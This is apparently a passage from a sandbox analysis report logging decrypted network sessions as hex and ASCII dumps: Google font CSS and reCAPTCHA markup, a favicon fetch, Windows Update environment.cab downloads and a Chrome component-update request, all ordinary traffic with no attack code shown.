                                                                                                                                                            Data Ascii: */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA
                                                                                                                                                            2024-02-20 22:46:12 UTC1252INData Raw: 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 42 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 37 30 2d 30 33 37 37 2c 20 55 2b 30 33 37 41 2d 30 33 37 46 2c 20 55 2b 30 33 38 34 2d 30 33 38 41 2c 20 55 2b 30 33 38 43 2c 20 55 2b 30 33 38 45 2d 30 33 41 31 2c 20 55 2b 30 33 41 33 2d 30 33 46 46 3b 0a 7d 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c
                                                                                                                                                            Data Ascii: rl(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBxc4EsA.woff2) format('woff2'); unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;}/* vietnamese */@font-face { font-family: 'Roboto'; font-style: normal
                                                                                                                                                            2024-02-20 22:46:12 UTC824INData Raw: 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 73 74 79 6c 65 73 5f 5f 6c 74 72 2e 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 52 61 72 54 36 36 7a 31 50 68 50 6c 57 64 57 72 36 6c 43 4a 78 77 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 20 3d 20 27 68 74 74
                                                                                                                                                            Data Ascii: , U+FEFF, U+FFFD;}</style><link rel="stylesheet" type="text/css" href="https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/styles__ltr.css"><script nonce="RarT66z1PhPlWdWr6lCJxw" type="text/javascript">window['__recaptcha_api'] = 'htt
                                                                                                                                                            2024-02-20 22:46:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            11192.168.2.549735142.250.80.364437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:13 UTC721OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                            Host: www.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: */*
                                                                                                                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
                                                                                                                                                            2024-02-20 22:46:14 UTC706INHTTP/1.1 200 OK
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                            Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                            Content-Length: 5430
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Server: sffe
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Date: Tue, 20 Feb 2024 16:18:58 GMT
                                                                                                                                                            Expires: Wed, 28 Feb 2024 16:18:58 GMT
                                                                                                                                                            Cache-Control: public, max-age=691200
                                                                                                                                                            Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                            Content-Type: image/x-icon
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Age: 23236
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close
                                                                                                                                                            2024-02-20 22:46:14 UTC546INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                                                                                            Data Ascii: h& ( 0.v]X:X:rY
                                                                                                                                                            2024-02-20 22:46:14 UTC1252INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 a6 75 ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff 0b be fb ff 05 bc fb ff b6 ec fe ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 aa 7b ff ff ff ff ff fd fd fd f9 fd fd fd db ff ff ff ff 35 c9 fc ff 0a b2 f9 ff 6b a4 f6 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea
                                                                                                                                                            Data Ascii: BBBBBuBBBBB{5k7R8F2Vb5C
                                                                                                                                                            2024-02-20 22:46:14 UTC1252INData Raw: de ee d8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 fe fe fe 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 24 fd fd fd ea ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff eb f5 e7 ff 8f c6 7b ff 54 a9 36 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 7e be 67 ff dd ee d7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 ff ff ff 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd d3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c4 e1 b9 ff 5c ac 3e ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34
                                                                                                                                                            Data Ascii: /${T6S4S4S4S4S4S4S4S4S4~g"\>S4S4S4S4S4S4S4S4S4S4
                                                                                                                                                            2024-02-20 22:46:14 UTC1252INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fa c8 aa ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                            Data Ascii: BBBBBBBBBBB}BBBBBBBBBBB}
                                                                                                                                                            2024-02-20 22:46:14 UTC1128INData Raw: ff ff ff ff a0 a7 f5 ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 81 8a f2 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 0b fd fd fd d5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b5 ba f7 ff 3e 4b eb ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 3f 4c eb ff ba bf f8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 26 fd fd fd eb ff ff ff
                                                                                                                                                            Data Ascii: 5C5C5C5C5C5C5C5C5C5C5C5C5C5C5C>K5C5C5C5C5C5C5C5C5C5C5C5C?L&


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            12192.168.2.54973340.68.123.157443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:14 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=heMuRbMeN2sFtAl&MD=ETfHWz5l HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                            2024-02-20 22:46:14 UTC560INHTTP/1.1 200 OK
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            Expires: -1
                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                            MS-CorrelationId: c914a029-68aa-4905-9570-f74ffbfe4bec
                                                                                                                                                            MS-RequestId: 4fa6f519-9a3d-46b9-8875-9c9deed2d5fa
                                                                                                                                                            MS-CV: 3AcF5RenP0G1OWlN.0
                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:13 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 24490
                                                                                                                                                            2024-02-20 22:46:14 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                            2024-02-20 22:46:14 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            13192.168.2.54974040.68.123.157443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:54 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=heMuRbMeN2sFtAl&MD=ETfHWz5l HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                            2024-02-20 22:46:54 UTC560INHTTP/1.1 200 OK
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            Expires: -1
                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                            ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                            MS-CorrelationId: 1d1815b3-a2e0-48fc-9d55-d36e58f3e5ee
                                                                                                                                                            MS-RequestId: a33c0e17-21e6-4ea6-b3c4-84cf17f15a4d
                                                                                                                                                            MS-CV: LSyoKJzbH0e9ArqW.0
                                                                                                                                                            X-Microsoft-SLSClientCache: 2160
                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:53 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 25457
                                                                                                                                                            2024-02-20 22:46:54 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                                            Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                                            2024-02-20 22:46:54 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                                            Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            14192.168.2.549741142.251.32.994437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:47:04 UTC1300OUTPOST /service/update2/json?cup2key=13:-vFhbXIYSt195hZ9czxEiHVOgNLWGS93mSplEOoaRLg&cup2hreq=ae79cd913e31312ed280fc40c79584ae139c71d008019539ab658d0e0144a261 HTTP/1.1
                                                                                                                                                            Host: update.googleapis.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 3784
                                                                                                                                                            X-Goog-Update-AppId: gonpemdgkjcecdgbnaabipppbmgfggbe,ihnlcenocehgdaegdmhbidjhnhdchfmm,neifaoindggfcjicffkgpmnlppeffabd,hnimpnehoodheedghdeeijklkeaacbdc,gcmjkmgdlgnkkcocmoeiminaijmmjnii,kiabhabjdbkjdpjbpigfodbdjmbglcoo,obedbbhbpmojnkanicioggnmelmoomoc,oimompecagnajdejgnnjijobebaeigek,hfnkpimlhhgieaddgfemjhofmfblmnib,khaoiebndkojlmppeemjhbpbandiljpe,llkgjffcdpffmhiakmfcdcblohccpfmo,giekcmmlnklenlaomppkphknjmnnpneh,laoigpblnllgcgjnjnllmfolckpjlhki,efniojlnjndmcbiieegkicadnoecjjef,ggkkehgbnfjpeggfpleeakpidbkibbmn,jamhcnnkihinmdlkakkaopbjbbcngflc,ojhpjlocmbogdgmfpkhlaaeamibhnphh,ehgidpndbllacpjalkiimkbadgjfnnmc,eeigpngbgcognadeebkilcpcaedhellh,jflookgnkcckhobaglndicnbbgbonegd,cocncanleafgejenidihemfflagifjic
                                                                                                                                                            X-Goog-Update-Interactivity: bg
                                                                                                                                                            X-Goog-Update-Updater: chrome-117.0.5938.132
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            2024-02-20 22:47:04 UTC3784OUTData Raw: 7b 22 72 65 71 75 65 73 74 22 3a 7b 22 40 6f 73 22 3a 22 77 69 6e 22 2c 22 40 75 70 64 61 74 65 72 22 3a 22 63 68 72 6f 6d 65 22 2c 22 61 63 63 65 70 74 66 6f 72 6d 61 74 22 3a 22 63 72 78 33 2c 70 75 66 66 22 2c 22 61 70 70 22 3a 5b 7b 22 5f 69 6e 74 65 72 6e 61 6c 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 73 65 74 73 22 3a 22 66 61 6c 73 65 22 2c 22 61 70 70 69 64 22 3a 22 67 6f 6e 70 65 6d 64 67 6b 6a 63 65 63 64 67 62 6e 61 61 62 69 70 70 70 62 6d 67 66 67 67 62 65 22 2c 22 62 72 61 6e 64 22 3a 22 4f 4e 47 52 22 2c 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 70 69 6e 67 22 3a 7b 22 72 22 3a 2d 32 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 7d 2c 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 30 2e 30 2e
                                                                                                                                                            Data Ascii: {"request":{"@os":"win","@updater":"chrome","acceptformat":"crx3,puff","app":[{"_internal_experimental_sets":"false","appid":"gonpemdgkjcecdgbnaabipppbmgfggbe","brand":"ONGR","enabled":true,"lang":"en-US","ping":{"r":-2},"updatecheck":{},"version":"0.0.0.
                                                                                                                                                            2024-02-20 22:47:04 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Vo3SQLGK7EbOEkp_OF39ow' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:47:04 GMT
                                                                                                                                                            X-Cup-Server-Proof: 3045022100abe54096118a8ca1c157bd84fbfa02431f3ba47f00618d424c0fb54505326a5202206d23b0ca874ed47fef0e671bb77a02457ab04903e4601dbe94eef23778a822c3:ae79cd913e31312ed280fc40c79584ae139c71d008019539ab658d0e0144a261
                                                                                                                                                            ETag: W/"3045022100abe54096118a8ca1c157bd84fbfa02431f3ba47f00618d424c0fb54505326a5202206d23b0ca874ed47fef0e671bb77a02457ab04903e4601dbe94eef23778a822c3:ae79cd913e31312ed280fc40c79584ae139c71d008019539ab658d0e0144a261"
                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                            Content-Length: 22465
                                                                                                                                                            X-Daynum: 6259
                                                                                                                                                            X-Daystart: 53224
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Server: GSE
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close
                                                                                                                                                            2024-02-20 22:47:04 UTC1252INData Raw: 29 5d 7d 27 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 65 72 76 65 72 22 3a 22 70 72 6f 64 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 33 2e 31 22 2c 22 64 61 79 73 74 61 72 74 22 3a 7b 22 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 22 3a 35 33 32 32 34 2c 22 65 6c 61 70 73 65 64 5f 64 61 79 73 22 3a 36 32 35 39 7d 2c 22 61 70 70 22 3a 5b 7b 22 61 70 70 69 64 22 3a 22 67 6f 6e 70 65 6d 64 67 6b 6a 63 65 63 64 67 62 6e 61 61 62 69 70 70 70 62 6d 67 66 67 67 62 65 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 7a 31 78 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 41 75 74 6f 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 75
                                                                                                                                                            Data Ascii: )]}'{"response":{"server":"prod","protocol":"3.1","daystart":{"elapsed_seconds":53224,"elapsed_days":6259},"app":[{"appid":"gonpemdgkjcecdgbnaabipppbmgfggbe","cohort":"1:z1x:","status":"ok","cohortname":"Auto","ping":{"status":"ok"},"updatecheck":{"statu
